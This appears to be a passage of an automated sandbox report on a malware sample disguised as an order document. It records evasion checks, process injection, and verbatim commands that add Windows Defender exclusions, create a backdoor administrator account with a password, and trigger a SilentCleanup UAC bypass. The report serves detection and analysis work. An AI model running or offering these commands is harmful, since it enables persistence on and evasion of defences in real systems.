                      Source: C:\Windows\SysWOW64\net1.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe TID: 900Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5752Thread sleep time: -6456360425798339s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1844Thread sleep time: -16602069666338586s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5644Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6904Thread sleep time: -13835058055282155s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6736Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3116Thread sleep count: 2874 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6968Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5384Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 4940Thread sleep time: -14757395258967632s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 5072Thread sleep count: 2586 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 5072Thread sleep count: 2870 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe TID: 7148Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6736Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe TID: 5584Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 5052Thread sleep time: -24903104499507879s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 5852Thread sleep count: 3974 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 5852Thread sleep count: 5817 > 30
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6625
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1957
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3482
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3603
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2874
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWindow / User API: threadDelayed 2586
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWindow / User API: threadDelayed 2870
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6077
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2613
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWindow / User API: threadDelayed 3974
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWindow / User API: threadDelayed 5817
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                      Source: C:\Windows\SysWOW64\net1.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeThread delayed: delay time: 922337203685477
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: VMwareVBoxARun using valid operating systemUSER
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: VMware
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: &C:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: %C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: )C:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: VIRTUALBOXUSOFTWARE\Oracle\VirtualBox Guest Additions!noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: "SOFTWARE\VMware, Inc.\VMware Tools
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: 'C:\WINDOWS\system32\drivers\vmmouse.sys
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Writes to foreign memory regionsShow sources
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 402000
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 43A000
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 43C000
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 10FA008
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 402000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 43A000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 43C000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: D96008
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43A000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43C000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: AA7008
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                      Adds a directory exclusion to Windows DefenderShow sources
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup users "user" /add
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators "user" /del
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user ADMIN~1 SECRET@1234 /add
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators ADMIN~1 /add
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup users "user" /add
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators "user" /del
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      Source: aspnet_regbrowsers.exe, 00000025.00000002.938674396.00000000019C0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: aspnet_regbrowsers.exe, 00000025.00000002.938674396.00000000019C0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: aspnet_regbrowsers.exe, 00000025.00000002.938674396.00000000019C0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: aspnet_regbrowsers.exe, 00000025.00000002.938674396.00000000019C0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeQueries volume information: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe VolumeInformation
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
